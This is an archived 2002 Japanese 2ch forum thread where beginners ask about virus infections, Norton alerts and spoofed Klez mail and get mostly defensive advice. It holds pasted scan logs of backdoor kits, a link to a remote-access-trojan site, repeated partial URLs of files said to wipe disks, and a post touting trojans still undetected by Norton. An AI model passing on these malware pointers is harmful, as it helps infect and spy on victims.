アンチウィルス検出力調査
http://ringonoki.net/sub/anti.html

参考にな。検出と駆除はまた別の能力だけどな。

545 :荒岸 ◆MONa3xWM :02/07/08 08:46 ID:???
>>544

これねぇ。AVGはウィルス警備隊に勝った!(笑)
あ、ANTIDOTEがXPに対応してるし。ちょっと落とそう。

546 :ひよこ名無しさん:02/07/08 11:04 ID:???
 AGE

547 :ひよこ名無しさん:02/07/08 17:49 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

548 :ひよこ名無しさん:02/07/09 01:21 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

549 :ひよこ名無しさん:02/07/09 01:41 ID:TG2PUJgq
先生!MXしてたらノートンさんが反応して
ウィルスを検出して速攻で止めたのですが
そういう事ってありえるんですかね?
何かブラウザか何かのクッキーが反応したのですが(ニムダ?


550 :ひよこ名無しさん:02/07/09 01:47 ID:???
>>549
エムエクースと言った時点でまともなレスは無いぞw

551 :ひよこ名無しさん:02/07/09 01:47 ID:???
>>549
MX(・A・)イクナイ (・∀・)カエレ!!

552 :ひよこ名無しさん:02/07/09 01:56 ID:B787Q6GU
ノーd先生いれてたのに
感染したんだけど・・・・・
そういうことってあるの?

553 :ひよこ名無しさん:02/07/09 01:57 ID:???
>>552
あります

554 :ひよこ名無しさん:02/07/09 02:01 ID:???
クリーン印須古最強

555 :ひよこ名無しさん:02/07/09 02:02 ID:???
>>552
何に「感染」したんだ

556 :ひよこ名無しさん:02/07/09 02:03 ID:B787Q6GU
net デビル

557 :ひよこ名無しさん:02/07/09 02:04 ID:LyDJUE3G
siemprevivir@setnet.cplって名前の添付ファイルがホットメールに送られてきたんですが・・・
ウイルス検知に引っかからなかったんで普通にDLしたんです。
でも気になったからさっき検索してみたらなんかウイルスみたいなページが出てきて・・・
これってやっぱりウイルスなんですか?どーやって駆除すればいいんですか?
教えてください(涙

558 :ひよこ名無しさん:02/07/09 02:05 ID:???
>>557
まずスキャン汁

559 :ひよこ名無しさん:02/07/09 02:06 ID:???
>>557
スキャンして、削除せえ

560 :ひよこ名無しさん:02/07/09 02:07 ID:LyDJUE3G
>>558
やり方わかりません(鬱死

561 :ひよこ名無しさん:02/07/09 02:08 ID:???
>>560
まさか・・・ウィルス対策をしていないとか?

562 :ひよこ名無しさん:02/07/09 02:08 ID:B787Q6GU
>>555
Net-Devil.v.1.5

563 :ひよこ名無しさん:02/07/09 02:09 ID:LyDJUE3G
>>561
全く(w
今日初めてネット繋いだPCやし・・・・ハァ

564 :ひよこ名無しさん:02/07/09 02:11 ID:???
>>563
とりあえずトレンドマイクロで検索してオンラインスキャンをしてこい。
早めに対策汁

565 :ひよこ名無しさん:02/07/09 02:11 ID:???
>>563
じゃ、ダメじゃん!明日ウイルス対策ソフト買ってきなさい!


566 :ひよこ名無しさん:02/07/09 02:12 ID:LyDJUE3G
>>564
トレンドマイクロって・・・ナンデスカ

567 :ひよこ名無しさん:02/07/09 02:14 ID:???
http://www.trendmicro.co.jp/hcall/index.asp
>>566

568 :ひよこ名無しさん:02/07/09 02:14 ID:???
オンラインスキャンしてきなさい
http://www.trendmicro.co.jp/hcall/index.asp

569 :ひよこ名無しさん:02/07/09 02:15 ID:???
みんな親切だな。かぶっちまった。

570 :ひよこ名無しさん:02/07/09 02:15 ID:dIHqXkq2
新型ウイルス「珍珍」
名前から分かる様に中国産と思われるウイルスが確認された。
感染力は弱いものの、ハードディスクの内容を書き換え
感染したパソコンのセキュリティを下げていわばネット上で丸裸にしてしまう。
詳しくはこちら↓

関連スレッド
【朕朕】お前らウイルス対策は完璧ですか?【珍珍】
http://corn.2ch.net/test/read.cgi/news/1024956234/l50

571 :ひよこ名無しさん:02/07/09 02:16 ID:???
>>570
くだらんモン貼るな!氏ね!

572 :ひよこ名無しさん:02/07/09 02:24 ID:B787Q6GU
>>>555
教えてw

573 :ひよこ名無しさん:02/07/09 02:24 ID:B787Q6GU
>>555>>555>>555
教えてw

574 :ひよこ名無しさん:02/07/09 02:25 ID:B787Q6GU
>>555>>555>>555
教えてw
Net-Devil.v.1.5だよーw


575 :557:02/07/09 02:34 ID:LyDJUE3G
スキャンした結果ウイルス感染してませんでした!
皆さん本当にありがとうございました!

576 :ひよこ名無しさん:02/07/09 02:35 ID:???
>>575
できるだけ早く対策しましょう。

577 :ひよこ名無しさん:02/07/09 02:37 ID:???
>>575
オンラインスキャンは「目安」だからな。明日ソフト買ってこいよ

578 :557:02/07/09 02:39 ID:LyDJUE3G
>>576-577
了解しました。
それでは

579 :ひよこ名無しさん:02/07/09 02:56 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

580 :ひよこ名無しさん:02/07/09 07:06 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

581 :Backdoor.NetDevil :02/07/09 11:22 ID:???
ファイル Server.exe 圧縮ファイルの中download.zip には Backdoor.NetDevil ウィルスが感染していました。ファイルは削除されました。
ウィルススキャンが完了しました。
スキャンした項目数:download.zip
マスターブートレコード:
スキャン:2 感染:0
修復:0
ブートレコード: スキャン:1 感染:0
修復:0
ファイル: スキャン:19 感染:1
修復:0_検疫:0
削除:1


582 :Backdoor.Lithium.B :02/07/09 17:15 ID:???
ノートン大先生のスキャン結果 7月8日定義で対応?
http://www.lithiumrat.org/main.html
ファイル srv_portscan.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_funstuff.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_pwinfo.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル srv_capture.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル LithiumServer.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/capture.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/pwinfo.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/funstuff.lte 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/default.ltf 圧縮ファイルの中lithium101b.zip には Backdoor.Lithium.B ウィルスが感染しています。このファイルは検疫されました。
ファイル Files/example.lsf 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル cli_capture.dll 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル Lithium.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル ServerEdit.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan ウィルスが感染しています。このファイルは検疫されました。
ファイル SiN.exe 圧縮ファイルの中lithium101b.zip には Backdoor.Trojan.Clien ウィルスが感染しています。このファイルは検疫されました。
ウィルススキャンが完了しました。
スキャンした項目数:lithium101b.zip
マスターブートレコード: スキャン:2 感染:0
修復:0
ブートレコード: スキャン:1 感染:0
修復:0
ファイル: スキャン:26 感染:14
修復:0_検疫:14
削除:0

583 :ひよこ名無しさん:02/07/09 18:17 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

584 :ひよこ名無しさん:02/07/09 18:17 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

585 :ひよこ名無しさん:02/07/09 21:23 ID:hn+Cap0o
W32.Duni.Wormに感染しますた…
どうしよう…

586 :ひよこ名無しさん:02/07/09 21:24 ID:???
>>585
スキャンしたのか?

587 :ひよこ名無しさん:02/07/09 21:24 ID:???
>>585
今すぐ回線切ってウィルス削除して氏んでください

588 :ひよこ名無しさん:02/07/09 21:32 ID:T2MmAQDs
友達に貸したら…
スキャンもなにもデスクトップにダウンロードされてますよ!
すでに、別の友達にメール送ってるみたいだ市…


589 :ひよこ名無しさん:02/07/09 21:34 ID:???
>>588 ( ゚Д゚)ハァ?

590 :ひよこ名無しさん:02/07/09 21:35 ID:???
>>588
何?それ??

591 :ひよこ名無しさん:02/07/09 22:08 ID:HBAAckKM
ノートンのウィルス定義先ほど自動的に変わった。
定義ウィルス数61643って書かれていたけど
新種のウィルス「W32LiacA@mm」っていうやつに対しては
このままで大丈夫かな。

592 :ひよこ名無しさん:02/07/09 22:10 ID:???
>>591
LiveUpdateだろ?ウイルス対策に神経質になると禿るぞ!

593 :591:02/07/09 22:19 ID:HBAAckKM
>>592
そのとおりです。
でもウィルス対策に神経質になりますよ。
デマのウィルスも含めてだけどこう新種のウィルスが出現しては(あっこれ
たわいもない一人言です。スマソ)

594 :ひよこ名無しさん:02/07/09 22:25 ID:???
>>593
少しでも知識があればそんなもん見分けられる。

595 :ひよこ名無しさん:02/07/09 22:27 ID:???
>>593
じゃ、基本を守ってれば心配するな!ヤならネットやめるか?

596 :591:02/07/09 22:36 ID:HBAAckKM
>>595
基本守ってればいいんですね。アドバイスありがとうございます。


597 :ひよこ名無しさん:02/07/09 22:44 ID:???
>>596
一応、本買って読んでおいた方がいいよ!

598 :591:02/07/09 23:02 ID:HBAAckKM
>>597
わかりました。

599 :ひよこ名無しさん:02/07/09 23:04 ID:???
>>598
ウイルス定義の更新も忘れるなよ!あと、バックアップは定期的にしといた
方がいいとおもうなぁ・・・

600 :ひよこ名無しさん:02/07/09 23:15 ID:???
2CHみてたらまたノートン先生が検疫へ逝けといいました。
はぁ〜。もうクレズもきてるし最近はやってるんだなぁ〜と実感。
プロバイダーのウィルスチェックだけにしなくてよかった。
ノートンのおかげで重くなっADSLなのに異常におそくなったけど・・・。

601 :ひよこ名無しさん:02/07/09 23:16 ID:???
>>600
あんたはバカだから気付かなかったと思うがこのスレの一番最新のテンプレ読んでみ?

602 :冷やし職人 ◆R0lAe0RQ :02/07/09 23:19 ID:???
>>600
>>488

603 :ひよこ名無しさん:02/07/09 23:51 ID:???
>>600
メモリ足りてる?

604 :600:02/07/09 23:59 ID:???
すみません初心者なもので・・・。
>>602さんありがとうございました。
意味がわかりました。
>>603増設したばかりです。多分大丈夫かと・・・。
どうせもう違う意味でこわれそうなPCですのでオークションにでも出そうかと。
まだいちおう動いているので。



605 :ひよこ名無しさん:02/07/10 00:03 ID:???
>>604
ちょっと待て!オークションに出すならHDの内容ちゃんと消去しとかんと
ヤバいぞ!

606 :ひよこ名無しさん:02/07/10 00:19 ID:???
>>604
そんな壊れそうなPCオークションにだすなよ

607 :ひよこ名無しさん:02/07/10 00:24 ID:???
>>603
動作環境を参照して、メモリをチェック。
あまりにも遅いんだったら。

608 :ひよこ名無しさん:02/07/10 00:30 ID:???
>>606
これがオークションに置ける合法的な詐欺ですわ。

609 :ひよこ名無しさん:02/07/10 00:35 ID:???
>>608
ワロタ

610 :7月8日定義で対応?:02/07/10 02:37 ID:???
http://tmp.2ch.net/test/read.cgi/download/1024930771/
------------------
http://tmp.2ch.net/test/read.cgi/download/1024930771/264
もうひとついいトロイの木馬を紹介する。
----------------
http://tmp.2ch.net/test/read.cgi/download/1024930771/429
ちなみに最近の新しい トロイの木馬も紹介しておくね♪
ノートン先生で今検知できるか試してみたけど まだ対応されてなかったから使うのなら今のうち♪

611 :ひよこ名無しさん:02/07/10 02:59 ID:???
>>610
bok2が1番ですw

612 :ひよこ名無しさん:02/07/10 11:22 ID:???
☆2ちゃんを見ていてノートンに警告されたら、誤認識かもしれません
 http://pc.2ch.net/test/read.cgi/sec/1025872269/を読んでみましょう

★ウイルスでしょうか?なんて悩んでる人は質問の前に>>1-16を読もう!

★初心者ほど簡単にウイルスに感染します。

★古いウイルス定義は意味がない! 常に最新のものを!

★「Re:」という題名のメールで添付ファイルが届いたら>>6>>12を読もう!

★突然、女性の顔写真が画面いっぱいに表示されたら>>13を読もう!

★悪質なワーム・Klez.Eの亜種が流行しはじめています。対策は十分に!
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.e%40mm.html
 http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.h@mm.html
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_KLEZ.G
 http://www.trendmicro.co.jp/klez/

★JS_EXCEPTIONが流行中。勉強しておきましょう。
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.A
 http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JS_EXCEPTION.GEN

★patch.exeという添付ファイルつきのメールはウイルスですよ。
  http://www.trendmicro.co.jp/virusinfo/news2002/worm_fbound_b.asp
  http://www.symantec.com/region/jp/news/year02/020314.html
  http://www.nai.com/japan/virusinfo/virF.asp?v=W32/Fbound.c@MM

★jdbgmgr.exeがウイルスだというデマメールが流行しています。騙されないように。
  http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/virus/false/jdbgmgr.asp

★これらのURLはHDDを綺麗サッパリ消去してくれるので絶対踏まない事!!
〜//80s/puolnau/syokusya.zip
〜/tbtb/apuroda/file/153.lzh
〜/uni.s2.xrea.com/tbtb/apuroda/file/153.lzh
〜/source/hoge00110_20020623033541.lzh

613 :ひよこ名無しさん:02/07/10 17:59 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

614 :ひよこ名無しさん:02/07/11 00:21 ID:hETZbdX0
VIP CLICK!!っていったい何なの?
知らない間にデスクトップに出現したんだけど。
こういうのはやっぱ開けない方が良いんだろうね。
ウイルススキャンしたら何も感染してませんってなってたんだけど…。

615 :ひよこ名無しさん:02/07/11 00:24 ID:???
>>614
大抵国際電話の接続プログラム。

616 :メルトダウン:02/07/11 01:57 ID:???
http://www.av-test.org/ アンチウィルスの検出能力の比較を行っているらしいが
結果がxlsで配布されてるので、俺には見えん・・。

617 :ひよこ名無しさん:02/07/11 02:10 ID:???
IE6ならば、どのウィルスでも
プレビューもしくは開いただけでは感染しないということですか?

618 :ひよこ名無しさん:02/07/11 02:13 ID:???
>>617
建前ではね…
でも過信しない方がいいと思われ。

619 :617:02/07/11 02:22 ID:???
>618
そうなんですか…
誰だかわからないけど、学校で配布されたアカウント名義で
「添付あり&件名が英語」のメールが来てるんです。

620 :ひよこ名無しさん:02/07/11 02:24 ID:???
>>619
その件名見て、自分と明らかに関係なければ読まずにゴミ箱行き。
どのみちプレビューは切っておいた方がイイよ。

Outlook Expressなんてメーラー使わないことも推奨。

621 :617:02/07/11 02:31 ID:???
たとえばポストペットやプ〜さんメールなんかを使っても
Outlook ExpressやOutlookを使うよりマシなんですか?

622 :ひよこ名無しさん:02/07/11 02:33 ID:???
>>621
ポスペはセキュリティホール指摘されてたな。

出来ればもうちょいマシなメーラー使ってくれ。

おすすめのメールソフトは何?Part3
http://pc.2ch.net/test/read.cgi/software/1020417135/
この辺に基本的なメーラーのリンク張ってあるから。

623 :ナナ:02/07/11 02:38 ID:CabexJt2
ウイルスが毎日のように日に2通も来たんですが、
誰かが故意に送ってるんでしょうか?


624 :617:02/07/11 02:40 ID:???
リンクありがとうございます。
今からじっくり読みたいと思います。


625 :ひよこ名無しさん:02/07/11 02:41 ID:???
>>623
普通。
メールでやり取りする人が多かったり、自分のサイトでメールアドレス晒してると、そんなもの。

626 :ナナ:02/07/11 02:43 ID:CabexJt2
>>625 そうですか、レス有り難う御座います。
なんか安心しました。
毎日のようにウイルスが来るので
誰かの悪戯かなと思って怖かったです。
有り難う御座います


627 :冷やし職人 ◆R0lAe0RQ :02/07/11 02:44 ID:???
>>623
故意に?そんなもんいちいちアドレス1つずつ
指定して送るわけ無いじゃん。
貴方のmailアドレス知ってる人にうらみ買ってるなら別だけど

628 : :02/07/11 03:46 ID:???
>>623
http://pc.2ch.net/test/read.cgi/sec/1024255721/
へ行け。

629 : :02/07/11 04:03 ID:???
>>628
「行け」とはなんだ? 尊大な態度をとるな。バカのくせに。

630 :尊大な態度をとるな。バカのくせに。:02/07/11 04:40 ID:???
>>629
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。
尊大な態度をとるな。バカのくせに。


631 :ひよこ名無しさん:02/07/11 09:34 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

632 :ひよこ名無しさん:02/07/11 12:50 ID:rqfUfBWq
1ヶ月ほど前から頻繁に同一人物と思われる相手からウィルスが届いています。
送信者は毎回違うのですがReturn-Pathが同じメールアドレスです。
その相手とは一度メールの交換をしています。

メールサイズは120から130KBぐらい。
添付ファイルがあり、本文は<iframe src=>が使用されています。

クレズウィルスのようなので
2回警告メールを送ったのですが、なしのつぶてです。
読んだら返事をくださいと書いてみたのですが返事ももらえず
ウィルスも止まりません。

Return-Pathが同じだったらその相手が感染していると思って間違いないのでしょうか?
もし違っていたら申し訳ないと思って頻繁にメールをおくるのをためらっています。
非常に迷惑なのでなんとかしたいのですが
こういう場合いったいどうするのが一番いいのでしょうか?
ガマンして削除続けるしかないのでしょうか?
(今はベッキーでメールサーバから削除で対処してます)

よろしくお願いします。

633 :ひよこ名無しさん:02/07/11 12:51 ID:???
>>632
迷惑メールに登録すれば?

634 :ひよこ名無しさん:02/07/11 12:54 ID:rqfUfBWq
>>633
毎回送信者が違うのですが、できますか?

635 :ひよこ名無しさん:02/07/11 12:59 ID:???
>>634
ならば無理。
元を断たねば。メールでしつこくウィルスチェックを促しましょう。
どうしてもならメアドを変えてみる。

636 :ひよこ名無しさん:02/07/11 13:03 ID:rqfUfBWq
>>635
であるから、本当にそやつが感染しているのかどうか自信がないのです。
ゴルァ!!メールを送ろうにもReturn-Pathまで偽装するという話も聞いたことがあるので・・・
(真偽はわかりませんが)

それでその真偽をお伺いしたいのですが・・・

637 :ひよこ名無しさん:02/07/11 13:05 ID:???
>>636
クレズはヘッダを偽装するよ。

638 :ひよこ名無しさん:02/07/11 13:07 ID:rqfUfBWq
>>637
ヘッダを偽装するのは知っています。
だから送信者が毎回違うのも当然だと思うのですが
Return-Pathのメアドがほぼ毎回一緒なんです。

639 :ひよこ名無しさん:02/07/11 13:09 ID:rqfUfBWq
もっと噛み砕いて質問します。
クレズウィルスが届くのですが、ヘッダを偽装するクレズウィルスの場合
大元の送信者を調べるにはどこを調べればいいのでしょうか?
Return-Pathまで偽装するというのは本当でしょうか?


640 :ひよこ名無しさん:02/07/11 13:10 ID:???
>>638
リメーラーを使った嫌がらせの時もあるかも。


641 :ひよこ名無しさん:02/07/11 13:16 ID:???
>>636
大元を調べるのは無理に近い。
相手がやる気ならなおさら。そうじゃなくてもかなり不可能。
Return-Pathまで偽装する亜種もあったような記憶があるので検索してみては。

642 :ひよこ名無しさん:02/07/11 13:24 ID:rqfUfBWq
>>640
リメーラーを使った形跡はありません。

>>641
Return-Pathはほぼ毎回同じなんですが
同じアドレスに偽装されているとしても当の本人から返事もこないんですよね。
身に覚えが無いとしたら何らかのリアクションがあると思うんですが・・・

あと、今思いついたんですが、とりあえずその人のメアドとプロバイダはわかってるので
プロバイダの方にお願いしてみるということは可能でしょうか?
確かそんな記事を見かけたような記憶が・・・


643 :ひよこ名無しさん:02/07/11 13:27 ID:???
>>642
そこまでは分らない。プロバイダに聞いてください。

644 :ひよこ名無しさん:02/07/11 13:41 ID:rqfUfBWq
>>643
ググルで色々調べているんですが、どうやら最終的にはプロバイダに聞いてみるしか手がなさそうです。
とりあえずもう一度送信者と思わしき人物にコンタクトを取ってみて
それでも無視されたら、プロバイダに働きかけてみようと思います。

色々とありがとうございました。


645 :ひよこ名無しさん:02/07/11 13:46 ID:???
>>644
オツカレー

646 :ひよこ名無しさん:02/07/11 18:28 ID:ysYMuGLq
すみません、ウイルスかどうかも分からないんですが、いつの間にか
windowsフォルダの中に長い名前の見知らぬファイルが複数出来ているんです。
ff003311_{62225D20-8159-11D6-B136-00A0B02989E2}.tmp という様な。
全てTMPファイルで0バイトなんで無視しようかとも思ったんですが、気が付くと
ローカルディスクの空き容量が減っているので削除したのに、いつの間にかまた
出来ているんです。

win98、NIS2002を入れてありウイルス定義は最新のもので毎週スキャンしています。
ウイルスは検出されません。宜しく御願いします。

647 :ひよこ名無しさん:02/07/11 18:39 ID:sc4yLfZc
ノートンでウイルススキャンしたら、
VBS.LOVELETTERというのが検出されて、
「修復できませんでした」となってしまいました。
どうしたらよいのでしょうか?
また、どんな被害があるのでしょうか?
教えてください。よろしくお願いします。

648 :ひよこ名無しさん:02/07/11 18:43 ID:???
>>647
上を読まんのか?488あたりを読め!あわてモンが

649 :647:02/07/11 18:52 ID:sc4yLfZc
>>648
焦ってたんで…一番最初のテンプレしか読まなかったです。
申し訳ない。そして、誘導してくれてありがとうございました。

ちなみにその際、ノートンで「検疫」というのを
実行してしまったのですが大丈夫なのでしょうか?

650 :ひよこ名無しさん:02/07/11 18:54 ID:???
>>649
ああ、かまわん!コレは「ウイルス」なんかじゃない。必要なければ
削除してしまえば?


651 :647:02/07/11 19:00 ID:sc4yLfZc
>>650
してしまいます!
ありがとうございました。お世話になりました。


652 :ひよこ名無しさん:02/07/11 21:38 ID:???
質問の前にここを読んでね

ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

653 :ひよこ名無しさん:02/07/11 23:11 ID:io2WNnxv
これ踏んじゃったんですけどウイルスですか?
ttp://users72.psychedance.com/img1/img20020711013230.jpg

654 :ひよこ名無しさん:02/07/11 23:12 ID:???
>>653
オマエの上のレス見ろや!

655 :ひよこ名無しさん:02/07/11 23:18 ID:???
>>654
ごめんなさい・・・
これからもお答えマン頑張ってください

656 :ひよこ名無しさん:02/07/11 23:19 ID:???
>>655
いいえ、ま、ノートンの過剰反応ですからね。

657 :ひよこ名無しさん:02/07/12 00:37 ID:jy81QEFQ
何のウィルスかを調べるにはどこを見たら良いのですか?

続けて2通来まして「Return path」は同じですが「From」が両方共違います。
この3件のアドレスには全く心当たりはありません。
KLEZかと思って調べた所、添付ファイルが.txtと.htmだった為
どうも違うと思って、幾つか流行のヤツ見たんだけど判らないのですが。

1件目のタイトルは「United States of America, local law may apply.」
添付は「LISENCE TEXT.txt」
2件目のタイトルは「A special good tool」で添付は.htmでした。
一目見てあやしいので削除してオンラインスキャンした所
大丈夫でしたがこれってウィルスですよね?
又、発信元を突き詰めるのはどうしたら良いのでしょう?

658 :ひよこ名無しさん:02/07/12 00:41 ID:???
>>657
http://www.trendmicro.co.jp/

659 :ひよこ名無しさん:02/07/12 01:38 ID:???
Return pathが発信元だよ
Return pathに書いてあるメアドのプロバイダにコピー送れ


660 :ひよこ名無しさん:02/07/12 02:26 ID:3KI7XuwL
突然パソコンの処理速度が遅くなってメモリ不足が出て、
パソコンが全く動かなくなってしまいました。
再起動させてCtrl+Alt+Deleteを押したら
「Wscript」というアプリ(?)が二つくらいありました。
数分後に見たらその「Wscript」が10個くらいに増えていました。
消しても消しても消えません。
「Wscript」でグーグル検索したら、
http://www.symantec.com/region/jp/sarcj/data/w/wscript.kakworm.html
というウィルスが紹介されていたのですがもしかしてこれでしょうか?
>Wscript.KakWormは、Microsoft Outlook Expressを使用して感染を広げます。
と書いてありますが、Outlookは一切使用しておりません。
思いあたることと言えば音楽ファイルをダウンロードしたくらいです。
教えて下さいお願いします・・・

661 :ひよこ名無しさん:02/07/12 02:28 ID:???
>>660
>音楽ファイルを・・・
エムエクースか?

662 :ひよこ名無しさん:02/07/12 02:32 ID:???
>>661
KaZaAというファイル共有ソフトです。

663 : :02/07/12 02:48 ID:???
>>657
こちらへ
http://pc.2ch.net/test/read.cgi/sec/1024255721/

664 :ひよこ名無しさん:02/07/12 03:02 ID:???
>>660
ttp://homepage2.nifty.com/winfaq/c/trouble.html#593

665 :660:02/07/12 03:15 ID:???
>>664
まさしくそれ以外の何者でもありません。
ありがとうございました!!がんばってみます!!!

666 :ひよこ名無しさん:02/07/12 07:59 ID:???
先生!2ちゃんのスレをかちゅーしゃで見ていたら
ノートンさんが反応して
「ウィルスを検出しました。アクセスできません」
と出たのですが、そういう事はありえるのでしょうか?

667 :ひよこ名無しさん:02/07/12 07:59 ID:???
>>666
上見ろ!ボケ

